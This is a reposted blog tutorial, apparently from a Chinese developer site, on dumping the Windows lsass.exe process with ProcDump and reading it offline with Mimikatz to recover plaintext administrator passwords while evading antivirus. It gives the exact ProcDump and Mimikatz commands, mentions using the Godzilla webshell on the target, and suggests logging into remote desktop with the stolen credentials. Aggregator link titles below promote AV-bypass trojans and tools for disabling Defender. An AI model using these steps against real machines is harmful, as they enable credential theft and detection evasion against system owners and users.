Use procdump+Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords - Code World

Use procdump+Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords

Language 2023-10-01 15:58:16 views: null

Use procdump+Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords

1.Principle
2. Practical part

1.Principle

Mimikatz extracts plaintext passwords from lsass.exe. When Mimikatz cannot run on the target machine, we can use the ProcDump tool to dump the system's lsass.exe process, export the dmp file, and drag it back to the local machine. Then use Mimikatz to read

ProcDump itself is used as a normal operation and maintenance auxiliary tool and does not contain viruses, so it will not be checked by killing software.

ProDump download address:

ProDumpDownload

2. Practical part

Copy the tool to the target machine, Godzilla displays as follows:

Insert image description here

Execute the following command (administrator rights required):

ProcDump.exe -accepteula -ma lsass.exe lsass.dmp

Dump successful:

Insert image description here

Download it locally and start using Mimikatz for analysis:

mimikatz.exe "log" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

Insert image description here

From the obtained information, you can get the administrator account and password, and you can connect directly to the remote desktop:

Insert image description here

For convenience, you can also output it directly to the password book:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full"> password.txt exit

Guess you like

Origin blog.csdn.net/Gherbirthday0916/article/details/132827499

Use procdump+Mimikatz to bypass anti-virus software and obtain Windows plaintext passwords

PowerShell script anti-kill/bypass/bypass anti-virus software

Computer anti-virus software which easy to use?

Install and use Linux, clamav's anti-virus software

what? Many computer advertisements? Do you still not use the malware removal tool that comes with the Windows system? Is it necessary to install anti-virus software on our computer?

Every time the computer is turned on, the anti-virus software reports that the iusb3mon.exe virus has been removed. How to remove the iusbmon virus from the computer and use anti-virus tools.

A button to turn off the automatic anti-virus software, Microsoft Windows Defender Software: Defender Control v1.5

Use Shecodject to generate anti-virus Trojans

A simple and easy-to-use anti-virus tool for intranet penetration [no-antivirus fscan, mimikatz, frp, etc.]

Microsoft anti-virus software, Microsoft Defender will release Linux versions

Antivirus Zap Pro for Mac (Mac anti-virus software)

Explain the anti-virus software ClamAV in the Linux environment

Используйте procdump+Mimikatz для обхода антивирусного программного обеспечения и получения паролей Windows в виде открытого текста.

How to bypass passwords and locks to monitor network traffic content and obtain administrator rights? ? ?

Unresolved-Mimikatz tried to obtain win10 plaintext password and reported an error

Configure anti-virus software to improve IntelliJ IDEA’s indexing and build speed (Antivirus Impact on Build Speed)

Use findstr to find sensitive file account passwords in Windows

When vscode is updated, the error Failed to install visual Studio Code update. Updates may fail due to anti-virus software

2019.9.20 use kali in metasploi obtain permission windows

Utilice procdump+Mimikatz para evitar el software antivirus y obtener contraseñas de texto sin formato de Windows

Windows common software installation and use

The spring project configuration file does not allow the solution of plaintext passwords (jasypt usage method)

Use SharedPreferences to do remember passwords

Hackers Can Use Windows Container Isolation Framework to Bypass Endpoint Security Systems

sophos anti-virus for mac|sophos anti-virus mac version download v8.0.23

Blockbuster: Using Vulnerabilities in McDonald's Website to Obtain User Passwords

Bypass | File Download Method in Windows

Windows software is easy to use eye protection

Use Duilib develop Windows software (4) - Messaging

Use Duilib develop Windows software (2) - Controls

Recommended

Ranking

A quick primer on numpy basics

Two sister tease python project

Java | Multiple keywords in the replacement content are returned to the front end in red style

C ++: references

The string leetcood 1018 is a binary prefix divisible by 5

Flutter 布局组件

Java combat spingboot-redis

PMP pre-exam sprint and wrong questions sorting

ActiveMq C# Message Features: Delayed and Timed Message Delivery

DSP28377S_ copy a program from the RAM to FLASH portion DETAILS

Daily

More

2024-05-16(23)

2024-05-15(5)

2024-05-14(9)

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)